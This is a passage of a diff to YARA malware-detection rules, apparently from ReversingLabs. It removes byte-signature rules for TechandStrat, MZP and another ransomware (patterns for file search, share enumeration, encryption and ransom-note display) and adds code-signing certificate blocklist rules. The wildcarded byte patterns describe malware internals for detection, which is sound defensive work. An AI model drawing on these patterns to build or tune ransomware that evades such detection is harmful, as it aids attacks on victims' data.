-            ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ??
-            FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D
-            ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ??
-            ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE
-            ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A
-        }
-		$find_files = {
-            00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17
-            72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ??
-            ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE
-            ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06
-            0D 2B ?? 09 2A
-        }
-		$get_file_list = {
-            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C
-            ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ??
-            ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B
-            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ??
-            ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $get_file_list ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "7b:75:c6:b0:a0:9a:fd:b9:78:7f:6d:ff:75:ae:78:44" and 1476662400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Techandstrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TechandStrat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "525d0b48-2018-5848-b9e7-def8395254eb"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "42cf5f07-4c43-567c-a517-42c898658ab8"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TechandStrat.yara#L1-L106"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13782-L13798"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "80e201cf91adeee100e05af3ba5227fc61968bb6e0ce602107ba1217a7a62856"
+		logic_hash = "1cc7d441291fd9c4dc37320d411f94fb362523d47d37ab35c20b3ac9d4cd75cb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TechandStrat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? C7 45 ?? ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
-        }
-		$enum_shares_p2 = {
-            8D 46 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF 36 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B
-            7D ?? 72 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A
-            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C2
-        }
-		$find_files = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 53 8B 5D ??
-            56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51
-            53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA ?? 75 ?? 8D 43 ?? 3B C8 74 ??
-            56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 80 FA ?? 74 ?? 80 FA ?? 74 ??
-            80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23
-            C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57
-            57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D
-            ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ??
-            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75
-            ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B FF 56 57
-            8B F9 8B 37 EB ?? FF 36 E8 ?? ?? ?? ?? 59 83 C6 ?? 3B 77 ?? 75 ?? FF 37 E8 ?? ?? ??
-            ?? 59 5F 5E C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8B 75 ?? 8D 44 24 ?? 57 50 C6 44
-            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B
-            44 24 ?? 81 E9 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 D8 ?? 6A ?? 6A ?? 50 51 FF 36 FF D7
-            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ??
-            81 BC 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33
-            D2 69 C0 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 83 C9 ?? 51 40 C7
-            44 24 ?? ?? ?? ?? ?? F7 F1 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 54 24 ?? 89 94
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 6A ?? 6A ?? 0F
-            11 84 24 ?? ?? ?? ?? 0F 57 C0 66 0F 13 44 24 ?? 8B 44 24 ?? 50 89 44 24 ?? 8B 44 24
-            ?? 50 FF 36 89 44 24 ?? FF D7 6A ?? 8D 44 24 ?? 0F 57 C0 50 68 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 66 0F 13 44 24 ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85
-            C0 0F 84
-        }
-		$encrypt_files_p2 = {
-            6A ?? 6A ?? FF 74 24 ?? 0F 11 84 24 ?? ?? ?? ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ??
-            6A ?? 8D 44 24 ?? 50 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 8B C8 85 C0 B8 ?? ?? ?? ?? 6A ?? 0F 44 C8 69 44 24 ?? ?? ?? ?? ??
-            33 D2 6A ?? 40 89 44 24 ?? F7 F1 8B 4C 24 ?? 33 C0 83 C2 ?? 13 C0 01 54 24 ?? 13 C8
-            8B 44 24 ?? 89 4C 24 ?? 0F A4 C1 ?? C1 E0 ?? 51 50 FF 36 89 4C 24 ?? 89 44 24 ?? FF
-            15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF
-            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 6A ?? 6A ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 89 44 24 ??
-            FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? FF D7 50 FF D6
-        }
-		$encrypt_files_p3 = {
-            6A ?? 6A ?? 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? 6A ??
-            8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? C6 44
-            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 80 7C 24 ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 83 C6 ??
-            56 FF 15 ?? ?? ?? ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            8B 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "16:7f:d1:29:5b:3b:b1:02:db:b3:72:92:c8:38:e7:cd" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_MZP : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MZP ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c08a4080-fa26-5b7b-869d-5f59096b1a12"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "f09ca101-dd40-54d8-9235-1faf1e774dd4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MZP.yara#L1-L147"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13800-L13816"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "724ae1033bfb8ff494b30e6b3333e6c848375f1b001b75e71c9444c9f9f31251"
+		logic_hash = "1d46ccaa136cd7be30ffbf0eb09eb6485c543ff4bdbe99fa7ea3846841cbd41b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MZP"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$show_ransom_note_p1 = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 53 56 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ??
-            ?? 88 55 ?? 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C3 E8 ?? ?? ??
-            ?? 89 1D ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 33 C0
-            89 46 ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
-            6A ?? 6A ?? 8D 45 ?? 50 33 C9 B2 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8D 86 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ??
-            C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ??
-            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ??
-            ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ??
-            ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8
-            ?? ?? ?? ?? B2 ?? 8B C6 E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 8B 00 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 33 D2 8B C6 E8
-        }
-		$show_ransom_note_p2 = {
-            C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ??
-            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ??
-            ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? B2
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 46 ?? ?? C6 46 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? C6 46
-            ?? ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            F0 89 73 ?? BA ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0
-            8D 46 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8B C6 C6
-            40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73
-            ?? 8B C6 C6 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 43 ?? 8B 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 33 D2 E8 ?? ?? ??
-            ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? 8D 46 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 43 ?? B2 ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 43 ?? 8B 73 ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? ?? 8D 46 ?? BA ?? ?? ??
-            ?? E8
-        }
-		$search_config_file = {
-            8B C0 53 56 8B F0 8A 9E ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 75 ??
-            8B 46 ?? 8B 48 ?? A1 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 D2 8B
-            86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 83 BE ?? ?? ?? ?? ?? 74 ?? 8B 96 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
-            EB ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 88 9E ?? ?? ?? ?? 8A 96 ?? ??
-            ?? ?? 8B C6 E8 ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 74 ?? 8B 46 ?? 8B 8E ?? ?? ?? ?? 8B
-            96 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8B 46 ?? E8 ?? ?? ?? ?? 8B 46 ?? 89
-            70 ?? 5E 5B C3
-        }
-		$track_mouse_event_for_entropy = {
-            53 56 83 C4 ?? 8B F0 8B 42 ?? 05 ?? ?? ?? ?? 83 E8 ?? 72 ?? 2D ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 8A 86 ?? ?? ?? ?? 88 44 24 ?? 66 83 BE ?? ?? ?? ?? ?? 74 ??
-            8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 8B D8 EB ?? 54 E8 ?? ?? ?? ?? 8D 4C 24 ??
-            8B D4 8B C6 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8D 54 24 ??
-            8B C6 E8 ?? ?? ?? ?? 8D 54 24 ?? 8B C4 E8 ?? ?? ?? ?? 8B D8 3A 5C 24 ?? 0F 84 ?? ??
-            ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 DB 74 ?? C6 86 ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ??
-            74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 8B 46 ?? 89 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB
-            ?? C6 86 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 46 ?? 89
-            44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ??
-            ?? ?? FF 96 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB ?? 80 BE ?? ?? ?? ?? ?? 74 ?? C6 86
-            ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ??
-            ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 5E 5B C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B FA
-            8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? 8D 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 8A 08 41 E8
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ??
-            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 53 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? FF 43
-        }
-		$find_files_p2 = {
-            80 7B ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? EB ?? 80 7B ?? ?? 74 ?? 8D
-            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 43 ?? E8 ?? ?? ?? ?? EB ??
-            8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8D 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            8B C0 33 D2 89 50 ?? 89 50 ?? 52 8D 50 ?? 52 FF 70 ?? FF 70 ?? FF 30 E8 ?? ?? ?? ??
-            85 C0 74 ?? 33 C0 C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? C3 33 C0 C3 51 8B 50 ?? 85 D2 7E
-            ?? 33 C9 89 48 ?? 51 8D 4C 24 ?? 51 52 FF 70 ?? FF 30 E8 ?? ?? ?? ?? 85 C0 74 ?? 33
-            C0 59 C3 E8 ?? ?? ?? ?? EB ?? FF 30 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 75 ?? C3
-            E8 ?? ?? ?? ?? C3 56 8B F0 33 C0 89 46 ?? 89 46 ?? 8B 46 ?? 2D ?? ?? ?? ?? 74 ?? 48
-            74 ?? 48 74 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ??
-            ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ??
-            ?? ?? ?? 80 7E ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 52 50 8D 46 ??
-            50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 06 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ??
-            ?? ?? FF 4E ?? 6A ?? FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 73 ??
-            33 C0 6A ?? 6A ?? 50 FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 6A ?? 8B D4 6A ?? 52
